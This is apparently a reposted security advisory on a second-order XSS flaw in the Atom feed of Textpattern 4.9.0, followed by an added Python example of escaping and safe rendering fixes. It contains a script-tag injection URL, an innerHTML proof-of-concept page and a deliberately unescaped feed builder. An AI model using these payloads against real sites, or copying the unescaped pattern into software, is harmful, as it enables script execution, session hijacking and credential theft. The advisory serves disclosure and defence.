Textpattern 4.9.0 Cross Site Scripting

Reported 26 Feb 2026 by indoushka. Source: packetstorm (packetstorm.news).

Textpattern 4.9.0 has a second-order XSS via Atom feed injection: user-supplied input is written unescaped into Atom feed fields, and the payload executes when a feed consumer renders the feed as HTML.

Code
    =============================================================================================================================================
    | # Title     : Textpattern 4.9.0 Second-Order XSS via Atom Feed Injection                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://textpattern.com/                                                                                                    |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/213262/
    
    [+] Summary    : A Second-Order Cross-Site Scripting (XSS) vulnerability exists in Textpattern CMS version 4.9.0 due to improper sanitization and contextual encoding
                     of user-supplied input embedded within Atom feed XML elements.
                     User-controlled parameters (such as category) are reflected into sensitive Atom fields including <id> and <link href> without proper XML escaping.
                     While the injected payload does not execute directly in modern browsers (due to XML context), it executes when the feed is consumed
                     by vulnerable HTML-based feed readers, admin dashboards, or CMS aggregators, resulting in JavaScript execution in a trusted context.
                     This vulnerability enables Supply-Chain XSS targeting administrative users and trusted systems.
    
    [+] Affected Product
    
    Product: Textpattern CMS
    
    Version: 4.9.0
    
    Component: Atom Feed Generator (/atom/)
    
    Attack Surface: Feed consumers (Admin panels, RSS/Atom readers)
    
    [+] Vulnerability Type
    
    Second-Order Cross-Site Scripting (XSS)
    
    Feed Injection / Trusted Content Injection
    
    [+] CWE / CAPEC Classification
    
    CWE-79: Improper Neutralization of Input During Web Page Generation
    
    CWE-116: Improper Encoding or Escaping of Output
    
    CAPEC-63: Cross-Site Scripting (Stored Injection)
    
    [+] Technical Details :
    
    The Atom feed endpoint reflects untrusted input directly into the following XML nodes:

    <id>
    <link href>
    
    [+] Example Injection Vector :
    /atom/?section=articles&category=meaningful-labor'"()%26%25<acx><ScRiPt>prompt(925482)</ScRiPt>
    
    [+] Resulting Atom Fragment :
    <id>
    tag:release-demo.textpattern.co,2005:.../articles/meaningful-labor'"()&%<acx>
    <ScRiPt>prompt(925482)</ScRiPt>
    </id>
    
    The payload is preserved verbatim, with no XML escaping of the quotes, ampersand or angle brackets, confirming the injection.
    
    [+] Exploitation Scenario (Second-Order) :

    1. Attacker injects a malicious payload via Atom feed parameters.
    2. Textpattern reflects the payload into the generated Atom XML.
    3. An administrator or system consumes the feed using admin feed preview panels, CMS importers, or custom dashboards.
    4. The feed content is inserted into the DOM using unsafe methods such as:

       element.innerHTML = feedContent;

    5. The JavaScript payload executes in the context of the trusted application.
    
    [+] PoC :
    
    <!DOCTYPE html>
    <html>
    <body>
    <div id="feed"></div>
    <script>
    fetch("https://127.0.0.1/release-demo.textpattern.co/atom/?section=articles&category=meaningful-labor'%22()%26%25<acx><ScRiPt>prompt(925482)</ScRiPt>")
    .then(r => r.text())
    .then(d => document.getElementById("feed").innerHTML = d);
    </script>
    </body>
    </html>
    
    [+] Result : prompt(925482)

    Confirms execution
    No false positives
    Demonstrates second-order exploitation
    
    [+] Impact :
    
    Arbitrary JavaScript execution in trusted admin interfaces
    
    Session hijacking
    
    Credential theft
    
    CSRF token extraction
    
    Supply-chain compromise via trusted feeds
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
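The two fixes a defender takes from this advisory, shown as an added example that is not part of the original advisory and not Textpattern's own code: on the producer side, escape text nodes and attribute values separately before they enter the Atom XML; on the consumer side, parse the feed with an XML parser and HTML-escape the extracted fields instead of assigning raw feed text to innerHTML. The base URL, the tag: URI prefix and the hostile category string are constructed values modelled on the advisory's injection vector, and the unescaped builder is a stand-in that reproduces the described flaw, not the CMS's feed generator.

```python
import html
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape, quoteattr

ATOM_NS = "http://www.w3.org/2005/Atom"
BASE_URL = "https://cms.example"          # constructed placeholder site
TAG_PREFIX = "tag:cms.example,2005:"      # constructed tag: URI prefix

# Constructed sample: the category value from the advisory's injection vector,
# as it arrives from the query string after URL decoding.
HOSTILE_CATEGORY = "meaningful-labor'\"()&%<acx><ScRiPt>prompt(925482)</ScRiPt>"


def build_entry_unescaped(base_url, category):
    """Stand-in for the flaw the advisory describes: the category is
    concatenated into <id> and <link href> with no XML escaping."""
    href = f"{base_url}/articles/{category}"
    return (f'<entry xmlns="{ATOM_NS}">'
            f"<id>{TAG_PREFIX}{href}</id>"
            f'<link href="{href}"/>'
            "</entry>")


def build_entry_escaped(base_url, category):
    """Hardened producer: escape() for text nodes, quoteattr() for attribute
    values (quoteattr also picks the quote character and handles both kinds)."""
    href = f"{base_url}/articles/{category}"
    id_text = escape(f"{TAG_PREFIX}{href}")
    return (f'<entry xmlns="{ATOM_NS}">'
            f"<id>{id_text}</id>"
            f"<link href={quoteattr(href)}/>"
            "</entry>")


def feed_is_well_formed(xml_text):
    """Producer-side check: a feed that fails to parse has almost certainly
    leaked raw markup or a bare '&' from user input into the XML."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


def entry_fields(xml_text):
    """Consumer side: read the feed with an XML parser so the payload comes
    back as character data, never as markup."""
    root = ET.fromstring(xml_text)
    ns = {"a": ATOM_NS}
    return {
        "id": root.findtext("a:id", namespaces=ns),
        "href": root.find("a:link", ns).get("href"),
    }


def render_entry_html(xml_text):
    """Consumer side: build HTML from the parsed fields with html.escape()
    instead of assigning raw feed text to innerHTML. A malformed feed is
    rejected (None) rather than dumped into the page."""
    if not feed_is_well_formed(xml_text):
        return None
    fields = entry_fields(xml_text)
    return (f'<a href="{html.escape(fields["href"])}">'
            f'{html.escape(fields["id"])}</a>')


if __name__ == "__main__":
    bad = build_entry_unescaped(BASE_URL, HOSTILE_CATEGORY)
    good = build_entry_escaped(BASE_URL, HOSTILE_CATEGORY)
    print("unescaped entry parses:", feed_is_well_formed(bad))   # False
    print("escaped entry parses:  ", feed_is_well_formed(good))  # True
    print(render_entry_html(good))
```

The unescaped entry does not even parse (the bare `&` and the unclosed `<acx>` break the XML), which is why the advisory notes that browsers refuse to execute it directly and why it only fires in consumers that treat the feed body as HTML. The escaped entry round-trips the hostile string intact as data, and the HTML renderer turns it into inert text.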


Vulners AI Score: 5 (Medium risk)